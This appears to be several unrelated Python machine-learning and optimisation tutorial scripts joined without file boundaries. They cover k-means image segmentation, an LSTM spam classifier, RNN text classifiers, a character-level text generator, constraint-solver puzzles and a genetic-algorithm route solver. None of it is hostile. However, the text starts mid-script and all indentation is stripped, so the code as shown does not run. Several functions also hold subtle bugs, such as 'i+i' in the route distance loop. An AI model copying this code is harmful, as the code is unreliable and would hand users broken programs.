k = 3
compactness, labels, (centers) = cv2.kmeans(pixel_values, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# convert back to 8 bit values
centers = np.uint8(centers)
# flatten the labels array
labels = labels.flatten()
# convert all pixels to the color of the centroids
segmented_image = centers[labels]
# reshape back to the original image dimension
segmented_image = segmented_image.reshape(image.shape)
# show the image
plt.imshow(segmented_image)
plt.show()
# disable only the cluster number 2 (turn the pixel into black)
masked_image = np.copy(image)
# convert to the shape of a vector of pixel values
masked_image = masked_image.reshape((-1, 3))
# color (i.e cluster) to disable
cluster = 2
masked_image[labels == cluster] = [0, 0, 0]
# convert back to original shape
masked_image = masked_image.reshape(image.shape)
# show the image
plt.imshow(masked_image)
plt.show()
import cv2
import numpy as np
cap = cv2.VideoCapture(0)
k = 5
# define stopping criteria
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.2)
while True:
# read the image
_, image = cap.read()
# reshape the image to a 2D array of pixels and 3 color values (RGB)
pixel_values = image.reshape((-1, 3))
# convert to float
pixel_values = np.float32(pixel_values)
# number of clusters (K)
_, labels, (centers) = cv2.kmeans(pixel_values, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)
# convert back to 8 bit values
centers = np.uint8(centers)
# convert all pixels to the color of the centroids
segmented_image = centers[labels.flatten()]
# reshape back to the original image dimension
segmented_image = segmented_image.reshape(image.shape)
# reshape labels too
labels = labels.reshape(image.shape[0], image.shape[1])
cv2.imshow("segmented_image", segmented_image)
# visualize each segment
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
# to use CPU uncomment below code
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
from keras.callbacks import ModelCheckpoint, TensorBoard
from sklearn.model_selection import train_test_split
import time
import numpy as np
import pickle
from utils import get_embedding_vectors, get_model, SEQUENCE_LENGTH, EMBEDDING_SIZE, TEST_SIZE
from utils import BATCH_SIZE, EPOCHS, int2label, label2int
def load_data():
"""
Loads SMS Spam Collection dataset
"""
texts, labels = [], []
with open("data/SMSSpamCollection") as f:
for line in f:
split = line.split()
labels.append(split[0].strip())
texts.append(' '.join(split[1:]).strip())
return texts, labels
# load the data
X, y = load_data()
# Text tokenization
# vectorizing text, turning each text into sequence of integers
tokenizer = Tokenizer()
tokenizer.fit_on_texts(X)
# lets dump it to a file, so we can use it in testing
pickle.dump(tokenizer, open("results/tokenizer.pickle", "wb"))
# convert to sequence of integers
X = tokenizer.texts_to_sequences(X)
print(X[0])
# convert to numpy arrays
X = np.array(X)
y = np.array(y)
# pad sequences at the beginning of each sequence with 0's
# for example if SEQUENCE_LENGTH=4:
# [[5, 3, 2], [5, 1, 2, 3], [3, 4]]
# will be transformed to:
# [[0, 5, 3, 2], [5, 1, 2, 3], [0, 0, 3, 4]]
X = pad_sequences(X, maxlen=SEQUENCE_LENGTH)
print(X[0])
# One Hot encoding labels
# [spam, ham, spam, ham, ham] will be converted to:
# [1, 0, 1, 0, 1] and then to:
# [[0, 1], [1, 0], [0, 1], [1, 0], [0, 1]]
y = [ label2int[label] for label in y ]
y = to_categorical(y)
print(y[0])
# split and shuffle
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=7)
# constructs the model with 128 LSTM units
model = get_model(tokenizer=tokenizer, lstm_units=128)
# initialize our ModelCheckpoint and TensorBoard callbacks
# model checkpoint for saving best weights
model_checkpoint = ModelCheckpoint("results/spam_classifier_{val_loss:.2f}", save_best_only=True,
verbose=1)
# for better visualization
tensorboard = TensorBoard(f"logs/spam_classifier_{time.time()}")
# print our data shapes
print("X_train.shape:", X_train.shape)
print("X_test.shape:", X_test.shape)
print("y_train.shape:", y_train.shape)
print("y_test.shape:", y_test.shape)
# train the model
model.fit(X_train, y_train, validation_data=(X_test, y_test),
batch_size=BATCH_SIZE, epochs=EPOCHS,
callbacks=[tensorboard, model_checkpoint],
verbose=1)
# get the loss and metrics
result = model.evaluate(X_test, y_test)
# extract those
loss = result[0]
accuracy = result[1]
precision = result[2]
recall = result[3]
print(f"[+] Accuracy: {accuracy*100:.2f}%")
print(f"[+] Precision: {precision*100:.2f}%")
print(f"[+] Recall: {recall*100:.2f}%")
import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from utils import get_model, int2label, label2int
from keras.preprocessing.sequence import pad_sequences
import pickle
import numpy as np
SEQUENCE_LENGTH = 100
# get the tokenizer
tokenizer = pickle.load(open("results/tokenizer.pickle", "rb"))
model = get_model(tokenizer, 128)
model.load_weights("results/spam_classifier_0.05")
def get_predictions(text):
sequence = tokenizer.texts_to_sequences([text])
# pad the sequence
sequence = pad_sequences(sequence, maxlen=SEQUENCE_LENGTH)
# get the prediction
prediction = model.predict(sequence)[0]
# one-hot encoded vector, revert using np.argmax
return int2label[np.argmax(prediction)]
while True:
text = input("Enter the mail:")
# convert to sequences
print(get_predictions(text))
import tqdm
import numpy as np
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Embedding, LSTM, Dropout, Dense
from keras.models import Sequential
import keras_metrics
SEQUENCE_LENGTH = 100 # the length of all sequences (number of words per sample)
EMBEDDING_SIZE = 100 # Using 100-Dimensional GloVe embedding vectors
TEST_SIZE = 0.25 # ratio of testing set
BATCH_SIZE = 64
EPOCHS = 20 # number of epochs
label2int = {"ham": 0, "spam": 1}
int2label = {0: "ham", 1: "spam"}
def get_embedding_vectors(tokenizer, dim=100):
embedding_index = {}
with open(f"data/glove.6B.{dim}d.txt", encoding='utf8') as f:
for line in tqdm.tqdm(f, "Reading GloVe"):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], dtype='float32')
embedding_index[word] = vectors
word_index = tokenizer.word_index
# we do +1 because Tokenizer() starts from 1
embedding_matrix = np.zeros((len(word_index)+1, dim))
for word, i in word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
# words not found will be 0s
embedding_matrix[i] = embedding_vector
return embedding_matrix
def get_model(tokenizer, lstm_units):
"""
Constructs the model,
Embedding vectors => LSTM => 2 output Fully-Connected neurons with softmax activation
"""
# get the GloVe embedding vectors
embedding_matrix = get_embedding_vectors(tokenizer)
model = Sequential()
model.add(Embedding(len(tokenizer.word_index)+1,
EMBEDDING_SIZE,
weights=[embedding_matrix],
trainable=False,
input_length=SEQUENCE_LENGTH))
model.add(LSTM(lstm_units, recurrent_dropout=0.2))
model.add(Dropout(0.3))
model.add(Dense(2, activation="softmax"))
# compile as rmsprop optimizer
# aswell as with recall metric
model.compile(optimizer="rmsprop", loss="categorical_crossentropy",
metrics=["accuracy", keras_metrics.precision(), keras_metrics.recall()])
model.summary()
return model
from tensorflow.keras.callbacks import TensorBoard
import os
from parameters import *
from utils import create_model, load_20_newsgroup_data
# create these folders if they does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
# dataset name, IMDB movie reviews dataset
dataset_name = "20_news_group"
# get the unique model name based on hyper parameters on parameters.py
model_name = get_model_name(dataset_name)
# load the data
data = load_20_newsgroup_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.summary()
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(data["X_test"], data["y_test"]),
callbacks=[tensorboard],
verbose=1)
model.save(os.path.join("results", model_name) + ".h5")
from tensorflow.keras.layers import LSTM
# max number of words in each sentence
SEQUENCE_LENGTH = 300
# N-Dimensional GloVe embedding vectors
EMBEDDING_SIZE = 300
# number of words to use, discarding the rest
N_WORDS = 10000
# out of vocabulary token
OOV_TOKEN = None
# 30% testing set, 70% training set
TEST_SIZE = 0.3
# number of CELL layers
N_LAYERS = 1
# the RNN cell to use, LSTM in this case
RNN_CELL = LSTM
# whether it's a bidirectional RNN
IS_BIDIRECTIONAL = False
# number of units (RNN_CELL ,nodes) in each layer
UNITS = 128
# dropout rate
DROPOUT = 0.4
### Training parameters
LOSS = "categorical_crossentropy"
OPTIMIZER = "adam"
BATCH_SIZE = 64
EPOCHS = 6
def get_model_name(dataset_name):
# construct the unique model name
model_name = f"{dataset_name}-{RNN_CELL.__name__}-seq-{SEQUENCE_LENGTH}-em-{EMBEDDING_SIZE}-w-{N_WORDS}-layers-{N_LAYERS}-units-{UNITS}-opt-{OPTIMIZER}-BS-{BATCH_SIZE}-d-{DROPOUT}"
if IS_BIDIRECTIONAL:
# add 'bid' str if bidirectional
model_name = "bid-" + model_name
if OOV_TOKEN:
# add 'oov' str if OOV token is specified
model_name += "-oov"
return model_name
from tensorflow.keras.callbacks import TensorBoard
import os
from parameters import *
from utils import create_model, load_imdb_data
# create these folders if they does not exist
if not os.path.isdir("results"):
os.mkdir("results")
if not os.path.isdir("logs"):
os.mkdir("logs")
if not os.path.isdir("data"):
os.mkdir("data")
# dataset name, IMDB movie reviews dataset
dataset_name = "imdb"
# get the unique model name based on hyper parameters on parameters.py
model_name = get_model_name(dataset_name)
# load the data
data = load_imdb_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.summary()
tensorboard = TensorBoard(log_dir=os.path.join("logs", model_name))
history = model.fit(data["X_train"], data["y_train"],
batch_size=BATCH_SIZE,
epochs=EPOCHS,
validation_data=(data["X_test"], data["y_test"]),
callbacks=[tensorboard],
verbose=1)
model.save(os.path.join("results", model_name) + ".h5")
from tensorflow.keras.preprocessing.sequence import pad_sequences
import numpy as np
from parameters import *
from utils import create_model, load_20_newsgroup_data, load_imdb_data
import pickle
import os
# dataset name, IMDB movie reviews dataset
dataset_name = "imdb"
# get the unique model name based on hyper parameters on parameters.py
model_name = get_model_name(dataset_name)
# data = load_20_newsgroup_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
data = load_imdb_data(N_WORDS, SEQUENCE_LENGTH, TEST_SIZE, oov_token=OOV_TOKEN)
model = create_model(data["tokenizer"].word_index, units=UNITS, n_layers=N_LAYERS,
cell=RNN_CELL, bidirectional=IS_BIDIRECTIONAL, embedding_size=EMBEDDING_SIZE,
sequence_length=SEQUENCE_LENGTH, dropout=DROPOUT,
loss=LOSS, optimizer=OPTIMIZER, output_length=data["y_train"][0].shape[0])
model.load_weights(os.path.join("results", f"{model_name}.h5"))
def get_predictions(text):
sequence = data["tokenizer"].texts_to_sequences([text])
# pad the sequences
sequence = pad_sequences(sequence, maxlen=SEQUENCE_LENGTH)
# get the prediction
prediction = model.predict(sequence)[0]
print("output vector:", prediction)
return data["int2label"][np.argmax(prediction)]
while True:
text = input("Enter your text: ")
prediction = get_predictions(text)
print("="*50)
print("The class is:", prediction)
from tqdm import tqdm
import numpy as np
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.layers import Dense, Dropout, LSTM, Embedding, Bidirectional
from tensorflow.keras.models import Sequential
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
from sklearn.model_selection import train_test_split
from sklearn.datasets import fetch_20newsgroups
from glob import glob
import random
def get_embedding_vectors(word_index, embedding_size=100):
embedding_matrix = np.zeros((len(word_index) + 1, embedding_size))
with open(f"data/glove.6B.{embedding_size}d.txt", encoding="utf8") as f:
for line in tqdm(f, "Reading GloVe"):
values = line.split()
# get the word as the first word in the line
word = values[0]
if word in word_index:
idx = word_index[word]
# get the vectors as the remaining values in the line
embedding_matrix[idx] = np.array(values[1:], dtype="float32")
return embedding_matrix
def create_model(word_index, units=128, n_layers=1, cell=LSTM, bidirectional=False,
embedding_size=100, sequence_length=100, dropout=0.3,
loss="categorical_crossentropy", optimizer="adam",
output_length=2):
"""
Constructs a RNN model given its parameters
"""
embedding_matrix = get_embedding_vectors(word_index, embedding_size)
model = Sequential()
# add the embedding layer
model.add(Embedding(len(word_index) + 1,
embedding_size,
weights=[embedding_matrix],
trainable=False,
input_length=sequence_length))
for i in range(n_layers):
if i == n_layers - 1:
# last layer
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=False)))
else:
model.add(cell(units, return_sequences=False))
else:
# first layer or hidden layers
if bidirectional:
model.add(Bidirectional(cell(units, return_sequences=True)))
else:
model.add(cell(units, return_sequences=True))
model.add(Dropout(dropout))
model.add(Dense(output_length, activation="softmax"))
# compile the model
model.compile(optimizer=optimizer, loss=loss, metrics=["accuracy"])
return model
def load_imdb_data(num_words, sequence_length, test_size=0.25, oov_token=None):
# read reviews
reviews = []
with open("data/reviews.txt") as f:
for review in f:
review = review.strip()
reviews.append(review)
labels = []
with open("data/labels.txt") as f:
for label in f:
label = label.strip()
labels.append(label)
# tokenize the dataset corpus, delete uncommon words such as names, etc.
tokenizer = Tokenizer(num_words=num_words, oov_token=oov_token)
tokenizer.fit_on_texts(reviews)
X = tokenizer.texts_to_sequences(reviews)
X, y = np.array(X), np.array(labels)
# pad sequences with 0's
X = pad_sequences(X, maxlen=sequence_length)
# convert labels to one-hot encoded
y = to_categorical(y)
# split data to training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
data = {}
data["X_train"] = X_train
data["X_test"]= X_test
data["y_train"] = y_train
data["y_test"] = y_test
data["tokenizer"] = tokenizer
data["int2label"] = {0: "negative", 1: "positive"}
data["label2int"] = {"negative": 0, "positive": 1}
return data
def load_20_newsgroup_data(num_words, sequence_length, test_size=0.25, oov_token=None):
# load the 20 news groups dataset
# shuffling the data & removing each document's header, signature blocks and quotation blocks
dataset = fetch_20newsgroups(subset="all", shuffle=True, remove=("headers", "footers", "quotes"))
documents = dataset.data
labels = dataset.target
tokenizer = Tokenizer(num_words=num_words, oov_token=oov_token)
tokenizer.fit_on_texts(documents)
X = tokenizer.texts_to_sequences(documents)
X, y = np.array(X), np.array(labels)
# pad sequences with 0's
X = pad_sequences(X, maxlen=sequence_length)
# convert labels to one-hot encoded
y = to_categorical(y)
# split data to training and testing sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=1)
data = {}
data["X_train"] = X_train
data["X_test"]= X_test
data["y_train"] = y_train
data["y_test"] = y_test
data["tokenizer"] = tokenizer
data["int2label"] = { i: label for i, label in enumerate(dataset.target_names) }
data["label2int"] = { label: i for i, label in enumerate(dataset.target_names) }
return data
import numpy as np
import pickle
import tqdm
from keras.models import Sequential
from keras.layers import Dense, LSTM, Dropout, Activation
from keras.callbacks import ModelCheckpoint
message = """
Please choose which model you want to generate text with:
1 - Alice's wonderland
2 - Python Code
"""
choice = int(input(message))
assert choice == 1 or choice == 2
if choice == 1:
char2int = pickle.load(open("data/wonderland-char2int.pickle", "rb"))
int2char = pickle.load(open("data/wonderland-int2char.pickle", "rb"))
elif choice == 2:
char2int = pickle.load(open("data/python-char2int.pickle", "rb"))
int2char = pickle.load(open("data/python-int2char.pickle", "rb"))
sequence_length = 100
n_unique_chars = len(char2int)
# building the model
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
if choice == 1:
model.load_weights("results/wonderland-v2-0.75.h5")
elif choice == 2:
model.load_weights("results/python-v2-0.30.h5")
seed = ""
print("Enter the seed, enter q to quit, maximum 100 characters:")
while True:
result = input("")
if result.lower() == "q":
break
seed += f"{result}\n"
seed = seed.lower()
n_chars = int(input("Enter number of characters you want to generate: "))
# generate 400 characters
generated = ""
for i in tqdm.tqdm(range(n_chars), "Generating text"):
# make the input sequence
X = np.zeros((1, sequence_length, n_unique_chars))
for t, char in enumerate(seed):
X[0, (sequence_length - len(seed)) + t, char2int[char]] = 1
# predict the next character
predicted = model.predict(X, verbose=0)[0]
# converting the vector to an integer
next_index = np.argmax(predicted)
# converting the integer to a character
next_char = int2char[next_index]
# add the character to results
generated += next_char
# shift seed and the predicted character
seed = seed[1:] + next_char
print("Generated text:")
print(generated)
import tensorflow as tf
import numpy as np
import os
import pickle
SEQUENCE_LENGTH = 200
FILE_PATH = "data/python_code.py"
BASENAME = os.path.basename(FILE_PATH)
text = open(FILE_PATH).read()
n_chars = len(text)
vocab = ''.join(sorted(set(text)))
print("vocab:", vocab)
n_unique_chars = len(vocab)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(vocab)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(vocab)}
# save these dictionaries for later generation
pickle.dump(char2int, open(f"{BASENAME}-char2int.pickle", "wb"))
pickle.dump(int2char, open(f"{BASENAME}-int2char.pickle", "wb"))
encoded_text = np.array([char2int[c] for c in text])
import tensorflow as tf
import numpy as np
import os
import pickle
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Dropout
from tensorflow.keras.callbacks import ModelCheckpoint
from string import punctuation
sequence_length = 100
BATCH_SIZE = 128
EPOCHS = 30
# dataset file path
FILE_PATH = "data/wonderland.txt"
# FILE_PATH = "data/python_code.py"
BASENAME = os.path.basename(FILE_PATH)
# commented because already downloaded
# import requests
# content = requests.get("http://www.gutenberg.org/cache/epub/11/pg11.txt").text
# open("data/wonderland.txt", "w", encoding="utf-8").write(content)
# read the data
text = open(FILE_PATH, encoding="utf-8").read()
# remove caps, comment this code if you want uppercase characters as well
text = text.lower()
# remove punctuation
text = text.translate(str.maketrans("", "", punctuation))
# print some stats
n_chars = len(text)
vocab = ''.join(sorted(set(text)))
print("unique_chars:", vocab)
n_unique_chars = len(vocab)
print("Number of characters:", n_chars)
print("Number of unique characters:", n_unique_chars)
# dictionary that converts characters to integers
char2int = {c: i for i, c in enumerate(vocab)}
# dictionary that converts integers to characters
int2char = {i: c for i, c in enumerate(vocab)}
# save these dictionaries for later generation
pickle.dump(char2int, open(f"{BASENAME}-char2int.pickle", "wb"))
pickle.dump(int2char, open(f"{BASENAME}-int2char.pickle", "wb"))
# convert all text into integers
encoded_text = np.array([char2int[c] for c in text])
# construct tf.data.Dataset object
char_dataset = tf.data.Dataset.from_tensor_slices(encoded_text)
# print first 5 characters
for char in char_dataset.take(5):
print(char.numpy())
# build sequences by batching
sequences = char_dataset.batch(2*sequence_length + 1, drop_remainder=True)
def split_sample(sample):
ds = tf.data.Dataset.from_tensors((sample[:sequence_length], sample[sequence_length]))
for i in range(1, (len(sample)-1) // 2):
input_ = sample[i: i+sequence_length]
target = sample[i+sequence_length]
other_ds = tf.data.Dataset.from_tensors((input_, target))
ds = ds.concatenate(other_ds)
return ds
def one_hot_samples(input_, target):
return tf.one_hot(input_, n_unique_chars), tf.one_hot(target, n_unique_chars)
sentences = []
y_train = []
for i in range(0, len(text) - sequence_length):
sentences.append(text[i: i + sequence_length])
y_train.append(text[i+sequence_length])
print("Number of sentences:", len(sentences))
# vectorization
X = np.zeros((len(sentences), sequence_length, n_unique_chars))
y = np.zeros((len(sentences), n_unique_chars))
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, char2int[char]] = 1
y[i, char2int[y_train[i]]] = 1
print("X.shape:", X.shape)
# building the model
# model = Sequential([
# LSTM(128, input_shape=(sequence_length, n_unique_chars)),
# Dense(n_unique_chars, activation="softmax"),
# ])
# a better model (slower to train obviously)
model = Sequential([
LSTM(256, input_shape=(sequence_length, n_unique_chars), return_sequences=True),
Dropout(0.3),
LSTM(256),
Dense(n_unique_chars, activation="softmax"),
])
# model.load_weights("results/wonderland-v2-2.48.h5")
model.summary()
model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
if not os.path.isdir("results"):
os.mkdir("results")
checkpoint = ModelCheckpoint("results/wonderland-v2-{loss:.2f}.h5", verbose=1)
# train the model
model.fit(X, y, batch_size=BATCH_SIZE, epochs=EPOCHS, callbacks=[checkpoint])
from constraint import Problem, Domain, AllDifferentConstraint
import matplotlib.pyplot as plt
import numpy as np
def _get_pairs(variables):
work = list(variables)
pairs = [ (work[i], work[i+1]) for i in range(len(work)-1) ]
return pairs
def n_queens(n=8):
def not_in_diagonal(a, b):
result = True
for i in range(1, n):
result = result and ( a != b + i )
return result
problem = Problem()
variables = { f'x{i}' for i in range(n) }
problem.addVariables(variables, Domain(set(range(1, n+1))))
problem.addConstraint(AllDifferentConstraint())
for pair in _get_pairs(variables):
problem.addConstraint(not_in_diagonal, pair)
return problem.getSolutions()
def magic_square(n=3):
def all_equal(*variables):
square = np.reshape(variables, (n, n))
diagonal = sum(np.diagonal(square))
b = True
for i in range(n):
b = b and sum(square[i, :]) == diagonal
b = b and sum(square[:, i]) == diagonal
if b:
print(square)
return b
problem = Problem()
variables = { f'x{i}{j}' for i in range(1, n+1) for j in range(1, n+1) }
problem.addVariables(variables, Domain(set(range(1, (n**2 + 2)))))
problem.addConstraint(all_equal, variables)
problem.addConstraint(AllDifferentConstraint())
return problem.getSolutions()
def plot_queens(solutions):
for solution in solutions:
for row, column in solution.items():
x = int(row.lstrip('x'))
y = column
plt.scatter(x, y, s=70)
plt.grid()
plt.show()
if __name__ == "__main__":
# solutions = n_queens(n=12)
# print(solutions)
# plot_queens(solutions)
solutions = magic_square(n=4)
for solution in solutions:
print(solution)
import numpy as np
import random
import operator
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from matplotlib import animation
from realtime_plot import realtime_plot
from threading import Thread, Event
from time import sleep
seaborn.set_style("dark")
stop_animation = Event()
# def animate_cities_and_routes():
# global route
# def wrapped():
# # create figure
# sleep(3)
# print("thread:", route)
# figure = plt.figure(figsize=(14, 8))
# ax1 = figure.add_subplot(1, 1, 1)
# def animate(i):
# ax1.title.set_text("Real time routes")
# for city in route:
# ax1.scatter(city.x, city.y, s=70, c='b')
# ax1.plot([ city.x for city in route ], [city.y for city in route], c='r')
# animation.FuncAnimation(figure, animate, interval=100)
# plt.show()
# t = Thread(target=wrapped)
# t.start()
def plot_routes(initial_route, final_route):
_, ax = plt.subplots(nrows=1, ncols=2)
for col, route in zip(ax, [("Initial Route", initial_route), ("Final Route", final_route) ]):
col.title.set_text(route[0])
route = route[1]
for city in route:
col.scatter(city.x, city.y, s=70, c='b')
col.plot([ city.x for city in route ], [city.y for city in route], c='r')
col.plot([route[-1].x, route[0].x], [route[-1].x, route[-1].y])
plt.show()
def animate_progress():
global route
global progress
global stop_animation
def animate():
# figure = plt.figure()
# ax1 = figure.add_subplot(1, 1, 1)
figure, ax1 = plt.subplots(nrows=1, ncols=2)
while True:
ax1[0].clear()
ax1[1].clear()
# current routes and cities
ax1[0].title.set_text("Current routes")
for city in route:
ax1[0].scatter(city.x, city.y, s=70, c='b')
ax1[0].plot([ city.x for city in route ], [city.y for city in route], c='r')
ax1[0].plot([route[-1].x, route[0].x], [route[-1].y, route[0].y], c='r')
# current distance graph
ax1[1].title.set_text("Current distance")
ax1[1].plot(progress)
ax1[1].set_ylabel("Distance")
ax1[1].set_xlabel("Generation")
plt.pause(0.05)
if stop_animation.is_set():
break
plt.show()
Thread(target=animate).start()
class City:
def __init__(self, x, y):
self.x = x
self.y = y
def distance(self, city):
"""Returns distance between self city and city"""
x = abs(self.x - city.x)
y = abs(self.y - city.y)
return np.sqrt(x ** 2 + y ** 2)
def __sub__(self, city):
return self.distance(city)
def __repr__(self):
return f"({self.x}, {self.y})"
def __str__(self):
return self.__repr__()
class Fitness:
def __init__(self, route):
self.route = route
def distance(self):
distance = 0
for i in range(len(self.route)):
from_city = self.route[i]
to_city = self.route[i+1] if i+i < len(self.route) else self.route[0]
distance += (from_city - to_city)
return distance
def fitness(self):
return 1 / self.distance()
def generate_cities(size):
cities = []
for i in range(size):
x = random.randint(0, 200)
y = random.randint(0, 200)
if 40 < x < 160:
if 0.5 <= random.random():
y = random.randint(0, 40)
else:
y = random.randint(160, 200)
elif 40 < y < 160:
if 0.5 <= random.random():
x = random.randint(0, 40)
else:
x = random.randint(160, 200)
cities.append(City(x, y))
return cities
# return [ City(x=random.randint(0, 200), y=random.randint(0, 200)) for i in range(size) ]
def create_route(cities):
return random.sample(cities, len(cities))
def initial_population(popsize, cities):
return [ create_route(cities) for i in range(popsize) ]
def sort_routes(population):
"""This function calculates the fitness of each route in population
And returns a population sorted by its fitness in descending order"""
result = [ (i, Fitness(route).fitness()) for i, route in enumerate(population) ]
return sorted(result, key=operator.itemgetter(1), reverse=True)
def selection(population, elite_size):
sorted_pop = sort_routes(population)
df = pd.DataFrame(np.array(sorted_pop), columns=["Index", "Fitness"])
# calculates the cumulative sum
# example:
# [5, 6, 7] => [5, 11, 18]
df['cum_sum'] = df['Fitness'].cumsum()
# calculates the cumulative percentage
# example:
# [5, 6, 7] => [5/18, 11/18, 18/18]
# [5, 6, 7] => [27.77%, 61.11%, 100%]
df['cum_perc'] = 100 * df['cum_sum'] / df['Fitness'].sum()
result = [ sorted_pop[i][0] for i in range(elite_size) ]
for i in range(len(sorted_pop) - elite_size):
pick = random.random() * 100
for i in range(len(sorted_pop)):
if pick <= df['cum_perc'][i]:
result.append(sorted_pop[i][0])
break
return [ population[index] for index in result ]
def breed(parent1, parent2):
child1, child2 = [], []
gene_A = random.randint(0, len(parent1))
gene_B = random.randint(0, len(parent2))
start_gene = min(gene_A, gene_B)
end_gene = max(gene_A, gene_B)
for i in range(start_gene, end_gene):
child1.append(parent1[i])
child2 = [ item for item in parent2 if item not in child1 ]
return child1 + child2
def breed_population(selection, elite_size):
pool = random.sample(selection, len(selection))
# for i in range(elite_size):
# children.append(selection[i])
children = [selection[i] for i in range(elite_size)]
children.extend([breed(pool[i], pool[len(selection)-i-1]) for i in range(len(selection) - elite_size)])
# for i in range(len(selection) - elite_size):
# child = breed(pool[i], pool[len(selection)-i-1])
# children.append(child)
return children
def mutate(route, mutation_rate):
route_length = len(route)
for swapped in range(route_length):
if(random.random() < mutation_rate):
swap_with = random.randint(0, route_length-1)
route[swapped], route[swap_with] = route[swap_with], route[swapped]
return route
def mutate_population(population, mutation_rate):
return [ mutate(route, mutation_rate) for route in population ]
def next_gen(current_gen, elite_size, mutation_rate):
select = selection(population=current_gen, elite_size=elite_size)
children = breed_population(selection=select, elite_size=elite_size)
return mutate_population(children, mutation_rate)
def genetic_algorithm(cities, popsize, elite_size, mutation_rate, generations, plot=True, prn=True):
global route
global progress
population = initial_population(popsize=popsize, cities=cities)
if plot:
animate_progress()
sorted_pop = sort_routes(population)
initial_route = population[sorted_pop[0][0]]
distance = 1 / sorted_pop[0][1]
if prn:
print(f"Initial distance: {distance}")
try:
if plot:
progress = [ distance ]
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
sorted_pop = sort_routes(population)
distance = 1 / sorted_pop[0][1]
progress.append(distance)
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
route = population[sorted_pop[0][0]]
else:
for i in range(generations):
population = next_gen(population, elite_size, mutation_rate)
distance = 1 / sort_routes(population)[0][1]
if prn:
print(f"[Generation:{i}] Current distance: {distance}")
except KeyboardInterrupt:
pass
stop_animation.set()
final_route_index = sort_routes(population)[0][0]
final_route = population[final_route_index]
if prn:
print("Final route:", final_route)
return initial_route, final_route, distance
if __name__ == "__main__":
cities = generate_cities(25)
initial_route, final_route, distance = genetic_algorithm(cities=cities, popsize=120, elite_size=19, mutation_rate=0.0019, generations=1800)
# plot_routes(initial_route, final_route)
import numpy
import matplotlib.pyplot as plt
import cv2
from PIL import Image
from multiprocessing import Process
def fig2img ( fig ):
"""
brief Convert a Matplotlib figure to a PIL Image in RGBA format and return it
param fig a matplotlib figure
return a Python Imaging Library ( PIL ) image
"""
# put the figure pixmap into a numpy array
buf = fig2data ( fig )
w, h, d = buf.shape
return Image.frombytes( "RGB", ( w ,h ), buf.tostring( ) )
def fig2data ( fig ):
"""
brief Convert a Matplotlib figure to a 4D numpy array with RGBA channels and return it
param fig a matplotlib figure
return a numpy 3D array of RGBA values
"""
# draw the renderer
fig.canvas.draw ( )
# Get the RGBA buffer from the figure
w,h = fig.canvas.get_width_height()
buf = numpy.fromstring ( fig.canvas.tostring_rgb(), dtype=numpy.uint8 )
buf.shape = ( w, h,3 )
# canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode
buf = numpy.roll ( buf, 3, axis = 2 )
return buf
if __name__ == "__main__":
pass
# figure = plt.figure()
